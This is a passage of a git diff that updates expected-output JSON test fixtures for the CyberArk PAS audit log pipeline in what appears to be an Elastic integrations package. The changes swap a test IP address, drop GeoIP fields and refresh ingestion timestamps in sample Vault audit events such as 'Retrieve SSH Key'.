\u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Retrieve SSH Key", "issuer": "Administrator", "pvwa_details": { @@ -192,7 +174,7 @@ "user_reason": "testing" }, "connection_details": { - "connection_address": "34.123.103.115" + "connection_address": "67.43.156.15" } } }, @@ -200,12 +182,12 @@ "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "127.0.0.1", "action": "Retrieve SSH Key", @@ -218,9 +200,9 @@ }, "event": { "severity": 2, - "reason": "(Action: Connect)testing(Connection to address: 34.123.103.115)", - "ingested": "2021-06-09T10:24:35.337721500Z", - "original": "\u003c5\u003e1 2021-03-11T21:08:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:08:48\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:08:48Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Connect)testing(Connection to address: 34.123.103.115)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cUserReason\u003etesting\u003c/UserReason\u003e\\n \u003cRetrieveAction\u003eConnect\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n \u003cConnectionDetails\u003e\\n \u003cConnectionAddress\u003e34.123.103.115\u003c/ConnectionAddress\u003e\\n \u003c/ConnectionDetails\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:08:48\",\"IsoTimestamp\":\"2021-03-11T21:08:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Connect)testing(Connection to address: 34.123.103.115)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"UserReason\":\"testing\",\"RetrieveAction\":\"Connect\"},\"ConnectionDetails\":{\"ConnectionAddress\":\"34.123.103.115\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "(Action: Connect)testing(Connection to address: 67.43.156.15)", + "ingested": "2021-12-09T13:37:04.741505500Z", + "original": "\u003c5\u003e1 2021-03-11T21:08:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:08:48\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:08:48Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Connect)testing(Connection to address: 67.43.156.15)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cUserReason\u003etesting\u003c/UserReason\u003e\\n \u003cRetrieveAction\u003eConnect\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n \u003cConnectionDetails\u003e\\n \u003cConnectionAddress\u003e67.43.156.15\u003c/ConnectionAddress\u003e\\n \u003c/ConnectionDetails\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:08:48\",\"IsoTimestamp\":\"2021-03-11T21:08:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Connect)testing(Connection to address: 67.43.156.15)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"UserReason\":\"testing\",\"RetrieveAction\":\"Connect\"},\"ConnectionDetails\":{\"ConnectionAddress\":\"67.43.156.15\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "428", "kind": "event", "action": "retrieve ssh key", @@ -244,20 +226,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -280,7 +253,7 @@ }, "@timestamp": "2021-03-15T13:18:52.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" @@ -292,7 +265,7 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", + "67.43.156.15", "10.0.1.20" ] }, @@ -302,7 +275,7 @@ "reason": "(Action: Retrieve SSH key)", "iso_timestamp": "2021-03-15T13:18:52Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:18:52\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:18:52Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e428\u003c/MessageID\u003e\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e(Action: Retrieve SSH key)\u003c/Reason\u003e\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\n \u003cGeneral\u003e\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\n \u003c/General\u003e\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:18:52\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:18:52Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e428\u003c/MessageID\u003e\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e(Action: Retrieve SSH key)\u003c/Reason\u003e\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\n \u003cGeneral\u003e\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\n \u003c/General\u003e\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Retrieve SSH Key", "issuer": "Administrator", "pvwa_details": { @@ -316,12 +289,12 @@ "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "127.0.0.1", "action": "Retrieve SSH Key", @@ -335,8 +308,8 @@ "event": { "severity": 2, "reason": "(Action: Retrieve SSH key)", - "ingested": "2021-06-09T10:24:35.337724300Z", - "original": "\u003c5\u003e1 2021-03-15T13:18:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:52\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:52Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Retrieve SSH key)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:52\",\"IsoTimestamp\":\"2021-03-15T13:18:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Retrieve SSH key)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"RetrieveAction\":\"Retrieve SSH key\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:04.741510100Z", + "original": "\u003c5\u003e1 2021-03-15T13:18:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:52\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:52Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e428\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Retrieve SSH key)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cRetrieveAction\u003eRetrieve SSH key\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:52\",\"IsoTimestamp\":\"2021-03-15T13:18:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"428\",\"Desc\":\"Retrieve SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Retrieve SSH key)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"RetrieveAction\":\"Retrieve SSH key\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve SSH Key\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "428", "kind": "event", "action": "retrieve ssh key", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json index 14516c9ea85..4b6b6cb97d7 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-449-create-discovery-succeeded.log-expected.json @@ -49,7 +49,7 @@ "event": { "severity": 2, "action": "create discovery succeeded", - "ingested": "2021-06-09T10:24:35.458324400Z", + "ingested": "2021-12-09T13:37:05.172001500Z", "original": "\u003c5\u003e1 2021-03-14T12:06:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:06:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:06:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e449\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate Discovery Succeeded\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eCreate Discovery Succeeded\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eStatus:Success; Discovery:\u003cWindows discovery from ELASTIC.local\u003e; Reason:;\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate Discovery Succeeded\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:06:35\",\"IsoTimestamp\":\"2021-03-14T12:06:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"449\",\"Desc\":\"Create Discovery Succeeded\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Create Discovery Succeeded\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Status:Success; Discovery:\u003cWindows discovery from ELASTIC.local\u003e; Reason:;\",\"ExtraDetails\":\"\",\"Message\":\"Create Discovery Succeeded\",\"GatewayStation\":\"\"}}}", "code": "449", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json index c180ebb321e..f2db8d5101b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-459-general-audit.log-expected.json @@ -76,7 +76,7 @@ "event": { "severity": 2, "action": "general audit", - "ingested": "2021-06-09T10:24:35.480432400Z", + "ingested": "2021-12-09T13:37:05.315103200Z", "original": "\u003c5\u003e1 2021-03-08T10:19:42Z VAULT 